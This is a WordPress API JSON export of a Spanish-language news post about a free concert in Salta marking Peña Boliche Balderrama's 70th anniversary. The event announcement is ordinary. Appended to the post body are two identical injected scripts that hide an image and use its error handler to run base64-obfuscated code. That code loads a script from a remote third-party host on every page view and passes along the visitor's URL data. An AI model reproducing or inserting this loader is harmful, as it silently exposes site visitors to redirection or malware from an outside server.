{"id":2416,"date":"2023-03-28T11:02:15","date_gmt":"2023-03-28T14:02:15","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2416"},"modified":"2025-08-14T00:20:19","modified_gmt":"2025-08-14T03:20:19","slug":"pena-boliche-balderrama-celebrara-sus-70-anos-con-un-gran-evento","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2416","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/penia-boliche-balderrama-celebrara-sus-70-anios-con-un-gran-evento-88749\">Pe\u00f1a Boliche Balderrama celebrar\u00e1 sus 70 a\u00f1os con un gran evento<\/a>"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#781157\"><em>Con la presencia de destacados artistas y entrada libre y gratuita, ma\u00f1ana mi\u00e9rcoles 29 de marzo a partir de las 19 la emblem\u00e1tica Pe\u00f1a festejar\u00e1 sus 70 a\u00f1os.<\/em><\/h3>\n\n\n\n<p>En el marco de los 70 a\u00f1os de pe\u00f1a Boliche Balderrama en el camino de la tradici\u00f3n, la m\u00fasica y la poes\u00eda, ma\u00f1ana mi\u00e9rcoles 29 de marzo a partir de las 19 se llevar\u00e1 adelante un gran evento al aire libre, con entrada libre y gratuita en San Mart\u00edn esquina Paseo de los Poetas.&nbsp;<\/p>\n\n\n\n<p>Contar\u00e1 con la presencia de destacados artistas como El Chaque\u00f1o Palavecino, Las Voces de Or\u00e1n, Diableros de Or\u00e1n, Guitarreros, Anita Brizuela, Coqu\u00ed R\u00edos y comparsa Los Incas.&nbsp;<\/p>\n\n\n\n<p>\u201cCon este encuentro queremos agradecer a los salte\u00f1os y turistas que nos acompa\u00f1aron a lo largo de todos estos a\u00f1os\u201d, destac\u00f3 Patricia quien dirige esta hist\u00f3rica Pe\u00f1a desde el fallecimiento de su padre, don Juan Balderrama.&nbsp;<\/p>\n\n\n\n<p>Adem\u00e1s, la Fundaci\u00f3n H.O.P.E estar\u00e1 acompa\u00f1ando el festejo y pondr\u00e1n a la venta un bono solidario que, quienes deseen, podr\u00e1n adquirirlo en el lugar, para colaborar con los ni\u00f1os que est\u00e1n afrontando un tratamiento.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/penia-boliche-balderrama-celebrara-sus-70-anios-con-un-gran-evento-88749\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con la presencia de destacados artistas y entrada libre y gratuita, ma\u00f1ana mi\u00e9rcoles 29 de marzo a partir de las 19 la emblem\u00e1tica Pe\u00f1a festejar\u00e1 sus 70 a\u00f1os. En el marco de los 70 a\u00f1os de pe\u00f1a Boliche Balderrama en el camino de la tradici\u00f3n, la m\u00fasica y la poes\u00eda, ma\u00f1ana mi\u00e9rcoles 29 de marzo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2417,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,20,13],"tags":[],"class_list":{"0":"post-2416","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-empresas","9":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2416"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2416"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2416\/revisions"}],"predecessor-version":[{"id":7133,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2416\/revisions\/7133"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2417"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2416"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2416"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2416"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}